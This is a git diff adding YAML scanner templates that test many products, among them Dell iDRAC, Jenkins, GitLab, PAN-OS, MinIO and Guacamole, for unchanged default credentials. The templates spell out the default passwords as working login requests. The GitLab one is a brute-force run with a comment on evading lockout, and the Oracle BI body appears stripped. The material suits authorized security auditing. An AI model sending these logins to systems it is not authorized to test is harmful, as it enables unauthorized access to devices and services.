+ - method: POST
+ cookie-reuse: true
+ path:
+ - "{{BaseURL}}/data/login"
+ body: "user=root&password=calvin"
+ headers:
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+ Content-Type: application/x-www-form-urlencode
+ Referer: "{{BaseURL}}/login.html"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 0
diff --git a/default-logins/dell/dell-idrac9-default-login.yaml b/default-logins/dell/dell-idrac9-default-login.yaml
new file mode 100644
index 0000000000..78d78f3130
--- /dev/null
+++ b/default-logins/dell/dell-idrac9-default-login.yaml
@@ -0,0 +1,34 @@
+id: dell-idrac9-default-login
+
+info:
+ name: DELL iDRAC9 Default Login
+ author: kophjager007,milo2012
+ severity: high
+ tags: dell,idrac,default-login
+
+requests:
+ - raw:
+ - |
+ POST /sysmgmt/2015/bmc/session HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0
+ Accept: application/json, text/plain, */*
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ User: "root"
+ Password: "calvin"
+ Content-Length: 0
+ Connection: close
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 201
+ - 200
+ condition: or
+
+ - type: word
+ part: body
+ words:
+ - '"authResult":0'
diff --git a/default-logins/dvwa/dvwa-default-login.yaml b/default-logins/dvwa/dvwa-default-login.yaml
new file mode 100644
index 0000000000..4cf084572e
--- /dev/null
+++ b/default-logins/dvwa/dvwa-default-login.yaml
@@ -0,0 +1,45 @@
+id: dvwa-default-login
+info:
+ name: DVWA Default Login
+ author: pdteam
+ severity: critical
+ tags: dvwa,default-login
+
+requests:
+ - raw:
+ - |
+ GET /login.php HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+ Connection: close
+
+ - |
+ POST /login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: PHPSESSID={{session}}; security=low
+ Connection: close
+
+ username=admin&password=password&Login=Login&user_token={{token}}
+
+ extractors:
+ - type: regex
+ name: token
+ group: 1
+ internal: true
+ part: body
+ regex:
+ - "hidden' name='user_token' value='([0-9a-z]+)'"
+
+ - type: kval
+ name: session
+ internal: true
+ part: body
+ kval:
+ - PHPSESSID
+
+ redirects: true
+ matchers:
+ - type: word
+ words:
+ - "You have logged in as 'admin'"
diff --git a/default-logins/exacqvision/exacqvision-default-credentials.yaml b/default-logins/exacqvision/exacqvision-default-credentials.yaml
new file mode 100644
index 0000000000..50e5cf8e5d
--- /dev/null
+++ b/default-logins/exacqvision/exacqvision-default-credentials.yaml
@@ -0,0 +1,36 @@
+id: exacqvision-default-credentials
+
+info:
+ name: ExacqVision Default Password
+ author: ELSFA7110
+ severity: high
+ tags: exacqvision,default-login
+ reference: https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf
+
+requests:
+ - raw:
+ - |
+ POST /service.web HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ Connection: close
+
+ action=login&u=admin&p=admin256
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "application/json"
+
+ - type: word
+ part: body
+ condition: and
+ words:
+ - '"auth":'
+ - '"success": true'
diff --git a/default-logins/flir/flir-ax8-default-credentials.yaml b/default-logins/flir/flir-ax8-default-credentials.yaml
new file mode 100644
index 0000000000..225cbfa45e
--- /dev/null
+++ b/default-logins/flir/flir-ax8-default-credentials.yaml
@@ -0,0 +1,41 @@
+id: flir-default-credentials
+
+info:
+ name: Flir Default Credentials
+ author: pikpikcu
+ severity: medium
+ tags: default-login,flir
+
+requests:
+ - raw:
+ - |
+ POST /login/dologin HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 35
+ Accept: */*
+ X-Requested-With: XMLHttpRequest
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ Accept-Encoding: gzip, deflate
+ Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+ Connection: closen
+
+ user_name=admin&user_password=admin
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - '"success"'
+
+ - type: dsl
+ dsl:
+ - contains(tolower(all_headers), 'text/html')
+ - contains(tolower(all_headers), 'phpsessid')
+ - contains(tolower(all_headers), 'showcameraid')
+
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/default-logins/frps/frp-default-credentials.yaml b/default-logins/frps/frp-default-credentials.yaml
new file mode 100644
index 0000000000..f096e880f6
--- /dev/null
+++ b/default-logins/frps/frp-default-credentials.yaml
@@ -0,0 +1,28 @@
+id: frp-default-credentials
+
+info:
+ name: Frp Default credentials
+ author: pikpikcu
+ severity: info
+ tags: frp,default-login
+ reference: https://github.com/fatedier/frp/issues/1840
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/proxy/tcp"
+ headers:
+ Authorization: "Basic YWRtaW46YWRtaW4="
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "proxies"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml
new file mode 100644
index 0000000000..49b317b44e
--- /dev/null
+++ b/default-logins/gitlab/gitlab-weak-login.yaml
@@ -0,0 +1,55 @@
+id: gitlab-weak-login
+info:
+ name: Gitlab Weak Login
+ author: Suman_Kar
+ severity: high
+ tags: gitlab,default-login
+
+ # Gitlab blocks for 10 minutes after 5 "Invalid" attempts for valid user.
+ # So make sure, not to attempt more than 4 password for same valid user.
+
+requests:
+
+ - payloads:
+
+ gitlab_password:
+ - 12345
+ - 123456789
+ gitlab_user:
+ - 1234
+ - admin
+ # Enumerate valid user.
+
+ attack: clusterbomb
+
+ raw:
+ - |
+ POST /oauth/token HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
+ Accept: application/json, text/plain, */*
+ Accept-Language: en-US,en;q=0.5
+ Referer: {{BaseURL}}
+ content-type: application/json
+ Connection: close
+
+ {"grant_type":"password","username":"§gitlab_user§","password":"§gitlab_password§"}
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - application/json
+
+ - type: word
+ part: body
+ words:
+ - '"access_token":'
+ - '"token_type":'
+ - '"refresh_token":'
+ condition: and
\ No newline at end of file
diff --git a/default-logins/glpi/glpi-default-credential.yaml b/default-logins/glpi/glpi-default-credential.yaml
new file mode 100644
index 0000000000..951b8b696c
--- /dev/null
+++ b/default-logins/glpi/glpi-default-credential.yaml
@@ -0,0 +1,74 @@
+id: glpi-default-credentials
+info:
+ name: GLPI Default Credentials Check
+ author: andysvints
+ severity: high
+ tags: glpi,default-login
+ description: GLPI is an ITSM software tool that helps you plan and manage IT changes. Checking is default super admin account(glpi/glpi) is enabled.
+ reference: https://glpi-project.org/
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Upgrade-Insecure-Requests: 1
+ Connection: keep-alive
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.70
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Accept-Encoding: gzip, deflate
+ Accept-Language: en-US,en;q=0.9,ru;q=0.8,uk;q=0.7
+
+ - |
+ POST /front/login.php HTTP/1.1
+ Host: {{Hostname}}
+ Connection: keep-alive
+ Content-Length: 179
+ Cache-Control: max-age=0
+ Upgrade-Insecure-Requests: 1
+ Origin: {{BaseURL}}
+ Content-Type: application/x-www-form-urlencoded
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.70
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Referer: {{BaseURL}}
+ Accept-Encoding: gzip, deflate
+ Accept-Language: en-US,en;q=0.9,ru;q=0.8,uk;q=0.7
+
+ {{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}}
+
+ cookie-reuse: true
+ redirects: true
+
+ extractors:
+ - type: regex
+ name: token
+ part: body
+ internal: true
+ group: 1
+ regex:
+ - "hidden\" name=\"_glpi_csrf_token\" value=\"([0-9a-z]+)\""
+
+ - type: regex
+ name: name
+ part: body
+ internal: true
+ group: 1
+ regex:
+ - "type=\"text\" name=\"([0-9a-z]+)\" id=\"login_name\" required=\"required\""
+
+ - type: regex
+ name: password
+ part: body
+ internal: true
+ group: 1
+ regex:
+ - "type=\"password\" name=\"([0-9a-z]+)\" id=\"login_password\" required=\"required\""
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'GLPI - Standard Interface '
+ - type: status
+ status:
+ - 200
diff --git a/default-logins/grafana/grafana-default-credential.yaml b/default-logins/grafana/grafana-default-credential.yaml
index 0e87426a93..202a386634 100644
--- a/default-logins/grafana/grafana-default-credential.yaml
+++ b/default-logins/grafana/grafana-default-credential.yaml
@@ -3,7 +3,7 @@ info:
name: Grafana Default Credentials Check
author: pdteam
severity: high
- tags: grafana,dlogin
+ tags: grafana,default-login
# https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection
# https://github.com/grafana/grafana/issues/14755
diff --git a/default-logins/guacamole/guacamole-default-login.yaml b/default-logins/guacamole/guacamole-default-login.yaml
new file mode 100644
index 0000000000..811d0daf45
--- /dev/null
+++ b/default-logins/guacamole/guacamole-default-login.yaml
@@ -0,0 +1,37 @@
+id: guacamole-default-credentials
+
+info:
+ name: Guacamole Default Credentials
+ author: r3dg33k
+ severity: high
+ tags: guacamole,default-login
+ reference: https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22.
+
+requests:
+ - raw:
+ - |
+ POST /api/tokens HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Origin: {{Hostname}}
+ Referer: {{Hostname}}
+
+ username=guacadmin&password=guacadmin
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"username"'
+ - '"authToken"'
+ - '"guacadmin"'
+ condition: and
+
+ - type: word
+ words:
+ - 'application/json'
+ part: header
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/default-logins/hongdian/hongdian-default-password.yaml b/default-logins/hongdian/hongdian-default-password.yaml
new file mode 100644
index 0000000000..6558607526
--- /dev/null
+++ b/default-logins/hongdian/hongdian-default-password.yaml
@@ -0,0 +1,49 @@
+id: hongdian-default-password
+
+info:
+ name: Hongdian Default Credentials
+ author: gy741
+ severity: high
+ tags: hongdian,default-login
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Cache-Control: max-age=0
+ Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+ Upgrade-Insecure-Requests: 1
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Accept-Encoding: gzip, deflate
+ Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+ Connection: close
+
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Cache-Control: max-age=0
+ Authorization: Basic YWRtaW46YWRtaW4=
+ Upgrade-Insecure-Requests: 1
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Accept-Encoding: gzip, deflate
+ Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+ Connection: close
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "text/html"
+ part: header
+
+ - type: word
+ words:
+ - "status_main.cgi"
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml b/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml
new file mode 100644
index 0000000000..132cee76fd
--- /dev/null
+++ b/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml
@@ -0,0 +1,31 @@
+id: hortonworks-smartsense-default-credentials
+
+info:
+ name: HortonWorks SmartSense Default Credentials
+ author: Techryptic (@Tech)
+ severity: high
+ description: Default Credentials of admin:admin on HortonWorks SmartSense application.
+ reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html
+ tags: hortonworks,smartsense,default-login
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/apt/v1/context'
+ headers:
+ Authorization: Basic YWRtaW46YWRtaW4=
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Set-Cookie: SUPPORTSESSIONID"
+ part: header
+
+ - type: word
+ words:
+ - "smartsenseId"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/default-logins/ibm/ibm-storage-default-credential.yaml b/default-logins/ibm/ibm-storage-default-credential.yaml
new file mode 100644
index 0000000000..05ebbcc3c5
--- /dev/null
+++ b/default-logins/ibm/ibm-storage-default-credential.yaml
@@ -0,0 +1,37 @@
+id: ibm-storage-default-credential
+
+info:
+ name: IBM Storage Management default creds
+ author: madrobot
+ severity: medium
+ tags: default-login,ibm
+
+requests:
+ - raw:
+ - |
+ POST /0/Authenticate HTTP/1.1
+ Host: {{Hostname}}
+ Origin: http://{{Hostname}}
+ Content-Length: 62
+ Content-Type: application/x-www-form-urlencoded
+ Connection: close
+
+ j_username=admin&j_password=admin&continue=&submit=submit+form
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "/0/Console"
+ - "Property of IBM"
+ condition: and
+
+ part: body
+ - type: word
+ words:
+ - "JSESSIONID"
+
+ part: header
+ - type: status
+ status:
+ - 200
diff --git a/default-logins/idemia/idemia-biometrics-default-credentials.yaml b/default-logins/idemia/idemia-biometrics-default-credentials.yaml
new file mode 100644
index 0000000000..da3d4290e4
--- /dev/null
+++ b/default-logins/idemia/idemia-biometrics-default-credentials.yaml
@@ -0,0 +1,34 @@
+id: idemia-biometrics-default-credentials
+
+info:
+ name: IDEMIA BIOMetrics Default Credentials
+ author: Techryptic (@Tech)
+ severity: high
+ description: Default Credentials of password=12345 on IDEMIA BIOMetrics application.
+ reference: https://www.google.com/search?q=idemia+password%3D+"12345"
+ tags: idemia,biometrics,default-login
+
+requests:
+ - method: POST
+ path:
+ - '{{BaseURL}}/cgi-bin/login.cgi'
+
+ body: password=12345
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "session_id="
+ - "resource"
+ condition: and
+
+ - type: word
+ words:
+ - "Invalid Password"
+ part: body
+ negative: true
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/default-logins/iptime/iptime-default-login.yaml b/default-logins/iptime/iptime-default-login.yaml
new file mode 100644
index 0000000000..9924878032
--- /dev/null
+++ b/default-logins/iptime/iptime-default-login.yaml
@@ -0,0 +1,32 @@
+id: iptime-default-login
+
+info:
+ name: ipTIME Default Login
+ author: gy741
+ severity: high
+ tags: iptime,default-login
+
+requests:
+ - raw:
+ - |
+ POST /sess-bin/login_handler.cgi HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+ Referer: http://{{Hostname}}/sess-bin/login_session.cgi
+ Connection: close
+
+ username=admin&passwd=admin
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "setCookie"
+ - "efm_session_id"
+ - "login.cgi"
+ part: body
+ condition: and
diff --git a/default-logins/jenkins/jenkins-default.yaml b/default-logins/jenkins/jenkins-default.yaml
new file mode 100644
index 0000000000..2d793558cc
--- /dev/null
+++ b/default-logins/jenkins/jenkins-default.yaml
@@ -0,0 +1,50 @@
+id: jenkins-weak-password
+
+info:
+ name: Jenkins Weak Password
+ author: Zandros0
+ severity: high
+ tags: jenkins,default-login
+
+requests:
+ - raw:
+ - |
+ GET /login HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /j_spring_security_check HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: {{cookie}}
+
+ j_username=admin&j_password=admin&from=%2F&Submit=Sign+in
+
+ - |
+ POST /j_spring_security_check HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: {{cookie}}
+
+ j_username=jenkins&j_password=password&from=%2F&Submit=Sign+in
+
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: {{cookie}}
+
+ extractors:
+ - type: regex
+ name: cookie
+ internal: true
+ part: header
+ regex:
+ - 'JSESSIONID\..*=([a-z0-9.]+)'
+
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body_4, "/logout")'
+ - 'contains(body_4, "Dashboard [Jenkins]")'
+ condition: and
\ No newline at end of file
diff --git a/default-logins/minio/minio-default-password.yaml b/default-logins/minio/minio-default-password.yaml
new file mode 100644
index 0000000000..7d2b90fde6
--- /dev/null
+++ b/default-logins/minio/minio-default-password.yaml
@@ -0,0 +1,41 @@
+id: minio-default-password
+
+info:
+ name: Minio Default Password
+ author: pikpikcu
+ severity: medium
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/minio/webrpc"
+ headers:
+ Content-Type: application/json
+ body: |
+ {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}
+
+ - method: POST
+ path:
+ - "{{BaseURL}}/minio/webrpc"
+ headers:
+ Content-Type: application/json
+ body: |
+ {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "Content-Type: application/json"
+ part: header
+
+ - type: word
+ words:
+ - 'uiVersion'
+ - 'token'
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/default-logins/nagios/nagios-default-credential.yaml b/default-logins/nagios/nagios-default-credential.yaml
new file mode 100644
index 0000000000..e582f205aa
--- /dev/null
+++ b/default-logins/nagios/nagios-default-credential.yaml
@@ -0,0 +1,24 @@
+id: nagios-default-credentials
+info:
+ name: Nagios Default Credentials Check
+ author: iamthefrogy
+ severity: high
+ tags: nagios,default-login
+ reference: https://www.nagios.org
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/nagios/side.php"
+ headers:
+ Authorization: Basic bmFnaW9zYWRtaW46bmFnaW9zYWRtaW4=
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - 'Current Status'
+ - 'Reports'
+ condition: and
diff --git a/default-logins/nexus/nexus-default-password.yaml b/default-logins/nexus/nexus-default-password.yaml
new file mode 100644
index 0000000000..8cde0421ba
--- /dev/null
+++ b/default-logins/nexus/nexus-default-password.yaml
@@ -0,0 +1,31 @@
+id: nexus-default-password
+
+info:
+ name: Nexus Default Password
+ author: pikpikcu
+ severity: high
+ tags: nexus,default-login
+
+requests:
+ - raw:
+ - |
+ POST /service/rapture/session HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 43
+ X-Nexus-UI: true
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ Connection: close
+
+ username=YWRtaW4%3D&password=YWRtaW4xMjM%3D
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 204
+ - type: word
+ words:
+ - "Server: Nexus"
+ - "NXSESSIONID"
+ part: header
+ condition: and
diff --git a/default-logins/nps/nps-default-password.yaml b/default-logins/nps/nps-default-password.yaml
index dd6d482919..d3ade09bfa 100644
--- a/default-logins/nps/nps-default-password.yaml
+++ b/default-logins/nps/nps-default-password.yaml
@@ -4,7 +4,7 @@ info:
name: NPS Default Password
author: pikpikcu
severity: high
- tags: nps,dlogin
+ tags: nps,default-login
requests:
- method: POST
diff --git a/default-logins/ofbiz/ofbiz-default-credentials.yaml b/default-logins/ofbiz/ofbiz-default-credentials.yaml
index 5d7ebfe61b..449c67c5b2 100644
--- a/default-logins/ofbiz/ofbiz-default-credentials.yaml
+++ b/default-logins/ofbiz/ofbiz-default-credentials.yaml
@@ -2,9 +2,9 @@ id: ofbiz-default-credentials
info:
name: Apache OfBiz Default Credentials
- author: pd-team
+ author: pdteam
severity: medium
- tags: ofbiz,dlogin
+ tags: ofbiz,default-login
requests:
- method: POST
diff --git a/default-logins/oracle/oracle-bi-default-credentials.yaml b/default-logins/oracle/oracle-bi-default-credentials.yaml
new file mode 100644
index 0000000000..25da32202d
--- /dev/null
+++ b/default-logins/oracle/oracle-bi-default-credentials.yaml
@@ -0,0 +1,42 @@
+id: oracle-business-intelligence-default-credentials
+
+info:
+ name: Oracle Business Intelligence Default Credentials
+ author: milo2012
+ severity: high
+ tags: oracle,default-login
+
+requests:
+ - raw:
+ - |
+ POST /xmlpserver/services/XMLPService HTTP/1.1
+ Content-Type: text/xml
+ SOAPAction: ""
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Encoding: gzip,deflate
+ Content-Length: 771
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
+ Host: {{Hostname}}
+ Connection: Keep-alive
+
+
+
+
+
+ Administrator
+ Administrator
+ bi
+
+
+
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'createSessionReturn'
+ part: body
diff --git a/default-logins/paloalto/panos-default-credentials.yaml b/default-logins/paloalto/panos-default-credentials.yaml
new file mode 100644
index 0000000000..15bc58afa5
--- /dev/null
+++ b/default-logins/paloalto/panos-default-credentials.yaml
@@ -0,0 +1,31 @@
+id: panos-default-credentials
+
+info:
+ name: Palo Alto Networks PAN-OS Default Credentials
+ author: Techryptic (@Tech)
+ severity: high
+ description: Default Credentials of admin:admin on Palo Alto Networks PAN-OS application.
+ reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks.
+ tags: paloalto,panos,default-login
+
+requests:
+ - method: POST
+ path:
+ - '{{BaseURL}}/php/login.php'
+
+ body: user=admin&passwd=admin&challengePwd=&ok=Login
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Set-Cookie: PHPSESSID"
+ part: header
+
+ - type: word
+ words:
+ - "Warning: Your device is still configured with the default admin"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/default-logins/panabit/panabit-default-password.yaml b/default-logins/panabit/panabit-default-password.yaml
new file mode 100644
index 0000000000..1aff766c6b
--- /dev/null
+++ b/default-logins/panabit/panabit-default-password.yaml
@@ -0,0 +1,45 @@
+id: panabit-gateway-defalut-password
+
+info:
+ name: Panabit Default Password
+ author: pikpikcu
+ severity: high
+ reference: https://max.book118.com/html/2017/0623/117514590.shtm
+ tags: panabit,default-login
+
+requests:
+ - raw:
+ - |
+ POST /login/userverify.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 246
+ Origin: {{BaseURL}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAjZMsILtbrBp8VbC
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
+ Referer: {{BaseURL}}/login/login.htm
+ Accept-Encoding: gzip, deflate
+ Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+ Connection: close
+
+ ------WebKitFormBoundaryAjZMsILtbrBp8VbC
+ Content-Disposition: form-data; name="username"
+
+ admin
+ ------WebKitFormBoundaryAjZMsILtbrBp8VbC
+ Content-Disposition: form-data; name="password"
+
+ panabit
+ ------WebKitFormBoundaryAjZMsILtbrBp8VbC--
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ' '
+ - 'urn:schemas-microsoft-com:vml'
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/default-logins/rabbitmq/rabbitmq-default-admin.yaml b/default-logins/rabbitmq/rabbitmq-default-admin.yaml
index a8d9d6d82a..034e6d241c 100644
--- a/default-logins/rabbitmq/rabbitmq-default-admin.yaml
+++ b/default-logins/rabbitmq/rabbitmq-default-admin.yaml
@@ -2,9 +2,9 @@ id: rabbitmq-default-admin
info:
name: RabbitMQ Default Credentials
- author: fyoorer & dwisiswant0
+ author: fyoorer,dwisiswant0
severity: high
- tags: rabbitmq,dlogin
+ tags: rabbitmq,default-login
requests:
- method: GET
diff --git a/default-logins/ricoh/ricoh-weak-password.yaml b/default-logins/ricoh/ricoh-weak-password.yaml
new file mode 100644
index 0000000000..a7db0ce8a6
--- /dev/null
+++ b/default-logins/ricoh/ricoh-weak-password.yaml
@@ -0,0 +1,28 @@
+id: ricoh-weak-password
+
+info:
+ name: Ricoh Weak Password
+ author: gy741
+ severity: high
+ tags: ricoh,default-login
+ reference: https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/
+
+requests:
+ - raw:
+ - |
+ POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: cookieOnOffChecker=on;
+
+ wimToken=&userid_work=&userid=YWRtaW4%3D&password_work=&password=&open=
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - 'wimsesid=[0-9]+'
+ part: header
+
+ - type: status
+ status:
+ - 302
diff --git a/default-logins/rockmongo/rockmongo-default-credentials.yaml b/default-logins/rockmongo/rockmongo-default-credentials.yaml
new file mode 100644
index 0000000000..2e2ec7b575
--- /dev/null
+++ b/default-logins/rockmongo/rockmongo-default-credentials.yaml
@@ -0,0 +1,31 @@
+id: rockmongo-default-credentials
+
+info:
+ name: Rockmongo Default Credentials
+ author: pikpikcu
+ severity: high
+ tags: rockmongo,default-login
+
+requests:
+ - raw:
+ - |
+ POST /index.php?action=login.index HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Content-Type: application/x-www-form-urlencoded
+ Referer: {{Hostname}}/index.php?action=login.index
+
+ more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "Location: /index.php?action=admin.index&host=0"
+ - "Set-Cookie: ROCK_LANG="
+ part: header
+
+ - type: status
+ status:
+ - 302
diff --git a/default-logins/samsung/samsung-wlan-ap-default-credentials.yaml b/default-logins/samsung/samsung-wlan-ap-default-credentials.yaml
index 386d2c2982..8355e8d87c 100644
--- a/default-logins/samsung/samsung-wlan-ap-default-credentials.yaml
+++ b/default-logins/samsung/samsung-wlan-ap-default-credentials.yaml
@@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: high
reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
- tags: samsung,dlogin
+ tags: samsung,default-login
requests:
- method: POST
diff --git a/default-logins/showdoc/showdoc-default-password.yaml b/default-logins/showdoc/showdoc-default-password.yaml
new file mode 100644
index 0000000000..f992f0dac8
--- /dev/null
+++ b/default-logins/showdoc/showdoc-default-password.yaml
@@ -0,0 +1,31 @@
+id: showdoc-default-password
+
+info:
+ name: Showdoc Default Password
+ author: pikpikcu
+ severity: medium
+ reference: |
+ - https://blog.star7th.com/2016/05/2007.html
+ tags: showdoc,default-login
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/server/index.php?s=/api/user/login"
+ body: |
+ username=showdoc&password=123456&v_code=
+
+ headers:
+ Content-Type: application/x-www-form-urlencoded;charset=UTF-8
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - '"username":"showdoc"'
+ - '"user_token":'
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/default-logins/solarwinds/solarwinds-default-admin.yaml b/default-logins/solarwinds/solarwinds-default-admin.yaml
index 2847743804..64d31401a7 100644
--- a/default-logins/solarwinds/solarwinds-default-admin.yaml
+++ b/default-logins/solarwinds/solarwinds-default-admin.yaml
@@ -4,7 +4,7 @@ info:
name: SolarWinds Orion Default Credentials
author: dwisiswant0
severity: high
- tags: solarwinds,dlogin
+ tags: solarwinds,default-login
# Optional:
# POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1
